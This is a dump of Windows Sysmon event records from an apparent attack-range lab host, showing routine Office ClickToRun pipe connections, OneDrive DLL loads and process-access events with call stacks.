18141800x800000000000000079161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000079157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:15.795{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Extras\qtquickextrasplugin.dll2021-04-20 14:58:15.795 18141800x800000000000000079156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.748{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.685{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.685{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000079152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:15.654{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\imageformats\qsvg.dll2021-04-20 14:58:15.654 18141800x800000000000000079151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000079149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:15.623{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC07-607E-350E-00000000BB01}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000079148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:15.623{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC07-607E-350E-00000000BB01}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000079147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.592{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.576{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.529{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000079140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:15.498{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Qt5Core.dll2021-04-20 14:58:15.498 18141800x800000000000000079139Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079138Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079137Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079136Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079135Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079134Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079133Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000079094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:15.467{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\amd64\FileCoAuthLib64.dll2021-04-20 14:58:15.467 18141800x800000000000000079093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.467{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.388{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.388{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.373{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.342{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.326{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.310{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:15.310{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000079082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:15.295{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B1-607E-9B05-00000000BB01}5448C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000079081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:15.295{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPC